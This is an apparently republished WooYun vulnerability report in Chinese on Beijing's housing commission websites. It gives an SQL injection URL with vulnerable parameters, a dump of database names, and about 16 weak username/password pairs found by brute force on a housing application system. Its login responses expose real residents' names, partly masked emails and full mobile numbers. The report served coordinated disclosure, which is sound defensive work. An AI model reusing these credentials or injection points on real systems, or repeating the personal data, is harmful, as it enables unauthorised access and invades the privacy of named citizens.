北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

2017年4月24日05:30:41评论548 views字数 243阅读0分48秒阅读模式

摘要

2016-04-22：细节已通知厂商并且等待厂商处理中
2016-04-26：厂商已经确认，细节仅向厂商公开
2016-05-06：细节向核心白帽子及相关领域专家公开
2016-05-16：细节向普通白帽子公开
2016-05-26：细节向实习白帽子公开
2016-06-10：细节向公众公开

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-199421

漏洞标题：北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

漏洞作者：路人甲

提交时间： 2016-04-22 22:40

公开时间： 2016-06-10 19:00

漏洞类型：应用配置错误

危害等级：高

自评Rank： 10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：弱口令

0人收藏

漏洞详情

披露状态：

简要描述：

再来一发

详细说明：

code 区域

http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666

Contract_qyh和Contract_Password

两个参数存在注入

上一个是Contract_mf注入点，由于没有进一步测试，所以上次就发了一个，经过测试其他两个也存在注入

code 区域

available databases [20]:
 [*] application
 [*] bjfdc
 [*] bjfdc_for_auditburea
 [*] bjfdc_tax
 [*] bjhouse
 [*] bjhouse_application
 [*] bjrema
 [*] datacenter
 [*] figure
 [*] jianceshi
 [*] master
 [*] model
 [*] msdb
 [*] policyhouse
 [*] real_estate_analyse
 [*] real_estate_analyse_bak
 [*] real_estate_analyseImportdata
 [*] tempdb
 [*] ttib
 [*] vk

漏洞证明：

code 区域

http://**.**.**.**/enroll/home.jsp

自住型商品房网上申购系统，验证码没什么用，大量用户弱口令，仅测试top500用户名，密码采用

123456,111111,000000，用户名等

code 区域

413 lirong lirong 200 false false 546 
 352 zhangjing zhangjing 200 false false 547 
 159 wangning wangning 200 false false 549 
 329 wanglong wanglong 200 false false 551 
 379 liuyuying liuyuying 200 false false 551 
 478 zhangkun zhangkun 200 false false 551 
 76 wangyulan wangyulan 200 false false 553 
 400 zhanglijuan zhanglijuan 200 false false 553 
 404 liguixiang liguixiang 200 false false 554 
 270 wangshuzhen wangshuzhen 200 false false 557 
 173 zhangfengying zhangfengying 200 false false 559 
 1041 lixia 123456 200 false false 543 
 1312 lixiumei 123456 200 false false 552 
 686 chenfang 111111 200 false false 553 
 1943 wangjinfeng 000000 200 false false 556 
 1075 zhangguiying 123456 200 false false 560

code 区域

{"flag":1,"message":"登录成功！","data":{"id":"54016","people_name":"李蓉","username":"lirong","email":"287084850@**.**.**.**","mobile":"15510318399"},"redirectUrl":null}
 {"flag":1,"message":"登录成功！","data":{"id":"12033","people_name":"张晶","username":"zhangjing","email":"6032561@**.**.**.**","mobile":"13801623808"},"redirectUrl":null}
 {"flag":1,"message":"登录成功！","data":{"id":"46993","people_name":"王宁","username":"wangning","email":"casio0018@**.**.**.**","mobile":"13521143322"},"redirectUrl":null}
 {"flag":1,"message":"登录成功！","data":{"id":"30169","people_name":"王龙","username":"wanglong","email":"wl_post@**.**.**.**","mobile":"13810447522"},"redirectUrl":null}

修复方案：

注入问题content_在内部可能还别的地方，多查看一下

第二个系统把验证码处理一下，另外提醒用户修改密码

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-26 18:50

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向北京市政府信息化主管部门通报，并抄报北京分中心协助处置，由其后续协调网站管理单位处置。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-199421

漏洞标题： 北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

相关厂商： 北京市住房和城乡建设委员会

漏洞作者： 路人甲

提交时间： 2016-04-22 22:40

公开时间： 2016-06-10 19:00

漏洞类型： 应用配置错误

危害等级： 高

自评Rank： 10

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 弱口令

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(6) 关注此漏洞

漏洞标题：北京市住建委漏洞打包(主站两处注入/可爆破获取用户信息)

相关厂商：北京市住房和城乡建设委员会

漏洞作者：路人甲

漏洞类型：应用配置错误

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：弱口令

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分